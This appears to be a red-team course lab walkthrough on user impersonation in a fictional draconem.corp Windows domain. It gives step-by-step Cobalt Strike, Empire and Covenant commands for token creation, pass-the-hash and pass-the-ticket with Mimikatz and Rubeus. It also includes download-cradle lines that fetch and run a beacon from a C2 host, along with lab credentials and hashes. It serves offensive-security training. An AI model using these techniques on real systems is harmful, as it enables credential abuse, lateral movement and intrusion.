Skip to content

Lab 4.3: User Impersonation

Objectives

  • Learn to impersonate users through various methods

TTPs Emulated in this Lab

Preparation

Preparation Steps

If you have lost your Beacon/Agent on wk01.draconem.corp please deploy a new one.

As a reminder, the credentials we have compromised are:

  • Username: Gareth.Kilgallen
  • password: Hu825meapvsAq#Rx
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp

Cobalt Strike can be accessed through guacamole http://10.130.2.22:8080/guacamole username: student password:Sec565!!
The Cobalt Strike Teamserver credentials are as follows
host: 10.130.4.100
password: sec565@!

The ports you can use with Cobalt Strike are 8888 for setting up a stager and 8443 for setting up a listener. The easiest way to land a beacon in the lab is using the Scripted Web Delivery function in Cobalt Strike and then performing a download cradle under the form of

iex (irm -useb http://10.130.4.100:8888/a)

replace /a with whatever value you provided in the dialogue in Cobalt Strike.

If you need to copy paste commands, you can do so by opening the guacamole menu. On a Windows device, the Guacamole menu is displayed by pressing Ctrl + Alt + Shift. On a Mac, the Guacamole menu is displayed by pressing Ctrl ^ + Command ⌘ + Shift.

A new guacamole menu will appear in which you'll be able to paste your text. afterwards you'll be able to paste the text of the guacamole menu in your guacamole session, just like any normal paste.

On your own

  1. Create a token for fs01\administrator and use it for lateral movement to fs01
  2. Pass-the-Hash (0269838C577E626B859F9D863B0C6316) of the local administrator and use it for lateral movement to fs01
  3. Pass-the-Ticket (A5AA48FD29A3A1F5336703AB9A793115) of Giulio.Stanion and use it for lateral movement to hr01

Walkthrough

Last lab, we identified that our user has access to the Sales share on fs01.draconem.corp. If we take a look on the share, a script could be found called troubleshooting.ps1, this script contains the following code:

$password = ConvertTo-SecureString "sup3rs3cr3tP@ssw0rd!!" -AsPlainText -Force
$creds = new-object System.Management.Automation.PSCredential("FS01\Administrator", $password)
$session = New-CimSession -ComputerName fs01.draconem.corp -Credential $creds
Grant-SmbShareAccess -name "Sales" -AccountName "Draconem\Sales" -AccessRight Full -CimSession $session
Remove-CimSession -CimSession $session

It seems this script contains the plain-text password of a local admin account! We could potentially leverage these credentials to lateral move. In order to do that, we will first have to impersonate the user.

In this lab, we will take a look on how to do just that.

Make Token

The most straightforward way to do user impersonation is to create a new token. In order to be able to execute this technique, the plain-text password must be known of the user you wish to impersonate. We are in luck as we retrieved the plain-text credentials from the PowerShell script.

Cobalt Strike approach

4. In order to create a new access token we can utilize the built-in make_token task.
make_token fs01.draconem.corp\Administrator sup3rs3cr3tP@ssw0rd!!

note: Cobalt Strike will return a successfully impersonated message with your current user as name, instead of the new user. This is expected and is a quirk in Cobalt Strike.

5. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account.

    ls \\fs01.draconem.corp\c$

6. Do not forget to issue the rev2self task to restore your regular privileges when you are done!

Empire approach

7. In order to create a new access token we can utilize the csharp/Sharpsploit.Credentials/MakeToken task:

  • Domain: FS01.draconem.corp
  • Password: sup3rs3cr3tP@ssw0rd!!
  • Username: Administrator

8. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account.

    ls \\fs01.draconem.corp\c$

9. Do not forget to issue the csharp/Sharpsploit.Credentials/RevertToSelf task to restore your regular privileges when you are done!

BONUS: Covenant approach

10. In order to create a new access token we can utilize the MakeToken task:

   maketoken Administrator fs01.draconem.corp sup3rs3cr3tP@ssw0rd!!

11. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account:

powershell ls \\fs01.draconem.corp\c$

12. Do not forget to issue the RevertToSelf task to restore your regular privileges when you are done!

Pass-the-Hash

What if we did not have the users password, but the NTLM hash 0269838C577E626B859F9D863B0C6316 instead?

If that was the case, we would have to Pass-the-Hash (or the ticket) instead! Unfortunately, we cannot do that without having local admin rights.

Perhaps the local admin account on wk01 has the same password as the one on fs01?

Cobalt Strike approach

13. If we want to pass-the-hash, we need a high privileged beacon. Let's try to spawn a new beacon as the local administrator account by using the local admin password we found for fs01.
spawnas allows you to spawn a new beacon provided you know the credentials.
NOTE: replace with the name of your listener (Cobalt Strike supports Tab completion for this command)
spawnas administrator sup3rs3cr3tP@ssw0rd!! <LISTENER_NAME>

A new beacon should check in (in a high privilege context).

now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin agent another way.

14. Now that we have a high integrity beacon, let's attempt to pass-the-hash. let's use the built-in pth task.
In Cobalt Strike, the pth task will spawn a new process to generate the new access token and then impersonate it in the current Beacon.
Run this command in the new beacon running as Administrator

pth fs01\Administrator 0269838c577e626b859f9d863b0c6316

15. Finally, we can access the C$ share of fs01.draconem.corp !
ls \\fs01.draconem.corp\c$

Empire approach

16. Empire has a task called powershell/management/spawnas which is perfect for the job.

This will spawn a new agent with the provided credentials.
- In the domain field make sure to enter wk01 and NOT wk01.draconem.corp as we want local authentication.
- As Password we want to fill in sup3rs3cr3tP@ssw0rd!!
- As username we want Administrator
- As listener we want our listener that we have created previously.

After a few seconds you should get greeted with a new, high privileged, agent!

That was fun, now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin agent another way.

17. Now that we have a high integrity agent, let's attempt to pass-the-hash. In order for us to do this with Empire, let's use the built-in powershell/credentials/mimikatz/pth task. As a reminder we want:
- The domain to be fs01.draconem.corp
- The ntlm hash to be 0269838c577e626b859f9d863b0c6316
- The user to be Administrator

18. In the output window, take close note of the PID of the cmd that was spawned as we need to steal that processes access token next.

This can be done with the powershell/credentials/tokens task. Make sure that:
- ImpersonateUser is set to True.
- ProcessID has been replaced to the PID of the output of the mimikatz command you ran earlier.

19. Finally, we can access the C$ share of fs01.draconem.corp !
ls \\fs01.draconem.corp\c$

BONUS: Covenant approach

Ironically, Covenant crashes when trying to create a token with interactive credentials.

20. We will use the PowerShell runas script from Empire to launch a new Grunt, the script can be downloaded here: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/management/Invoke-RunAs.ps1, it is also available in your slingshot VM under /home/sec565/tools.

Attention

Do not forget to issue the PowerShellImport task first to import the Invoke-RunAs script.

PowerShell Invoke-RunAs -username Administrator -password sup3rs3cr3tP@ssw0rd!! -cmd "cmd.exe" -Arguments "/k powershell -c iex(new-object net.webclient).downloadstring('<YOUR COVENANT STAGER URL>')"

After a few seconds a new, high privileged grunt will have checked in:

That was fun, now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin grunt another way. Now that we have a high integrity grunt, let's attempt to pass-the-hash. In order for us to do this with Covenant, let's use Mimikatz to pass-the-hash.

21. As already mentioned, the bundled Mimikatz version of Covenant is outdated, as a result it is better to use the Invoke-Mimikatz fork of BCSecurity, which can be downloaded here: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1, it is also available in your Slingshot VM under the /home/sec565/tools folder.

Pay close attention to the quotes, the entire command is wrapped in single quotes and the commands themselves are wrapped by double quotes individually:

powershell Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::pth /domain:fs01.draconem.corp /user:Administrator /rc4:0269838C577E626B859F9D863B0C6316"'

In the output window, take close note of the PID of the cmd that was spawned as we need to steal that processes access token next. This can be done with the ImpersonateProcess task:

22. Finally, we can access the C$ share of fs01.draconem.corp !

    powershell ls \\fs01.draconem.corp\c$

Pass-the-Ticket

Unfortunately, with a local account pass-the-ticket will not work. This is because local accounts do not deal with kerberos, as we have seen during the lecture. Let's for the sake of the lab, say that we have compromised another domain account.

UserName:Giulio.Stanion
NTLM:A5AA48FD29A3A1F5336703AB9A793115
Can you enumerate the access rights of this user? (preferably without BloodHound)

This user is local admin on hr01.draconem.corp

Cobalt Strike approach

Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged beacon (running as Gareth.Kilgallen).

23. As we want to make sure we are not interfering with the logon session of our compromised user, we need to create a sacrificial session.
make_token draconem.corp\dontknow dontcare

24. Now that we have the sacrificial session we can use Rubeus to create a tgt for Giulio.Stanion.
HOWEVER, we need to take something very important into account. Cobalt Strike's Execute-Assembly command will execute in an arbitrary process (which will not be using the token we just created). As a result importing the ticket would fail.
To bypass this problem, we will use inlineExecute-Assembly

We will need to load the inlineExecute-Assembly CNA script in our Cobalt Strike Client. Please navigate to Cobalt Strike -> Script Manager in your Cobalt Strike Client.

Then press the Load button in the new tab that opened in the bottom half of the client.

Please navigate to C:\Tools\Inline-ExecuteAssembly\InlineExecuteAssembly and select the cna script then press Open.

You can now go back to your beacon tab and execute the following command:

    inlineExecute-Assembly --dotnetassembly C:\Tools\Rubeus.exe --assemblyargs asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt

25. And finally, we can now access the C$ share of hr01.draconem.corp.

ls \\hr01.draconem.corp\c$

Empire approach

Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged agent.

18. We can use the csharp/Sharpsploit.Credentials/MakeToken task to make a sacrificial session, as we want to make sure we are not interfering with the logon session of our compromised user.
- Domain: draconem.corp
- Password : dontknow
- Username : dontcare

19. Now that we have the sacrificial session we can use the powershell/credentials/rubeus task to create a tgt for Giulio.Stanion. In the command field enter the following:

asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt

20. And finally, we can now access the C$ share of hr01.draconem.corp.
ls \\hr01.draconem.corp\c$

21. Again, do not forget to revert to self (csharp/Sharpsploit.Credentials/RevertToSelf) after you are done to restore your normal access rights:

BONUS: Covenant approach

14. Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged Grunt. We can use the MakeToken task to make a sacrificial session.

    maketoken dontcare draconem.corp dontcare

15. Now that we have the sacrificial session we can use the Rubeus to create a tgt for Giulio.Stanion:

rubeus asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt

16. And finally, we can now access the C$ share of hr01.draconem.corp.
ls \\hr01\c$ or ls \\hr01.draconem.corp\c$

17. Again, do not forget to revert to self after you are done to restore your normal access rights.
RevToSelf

If you've got some time left, feel free to try out the same scenario with the other C2 channel!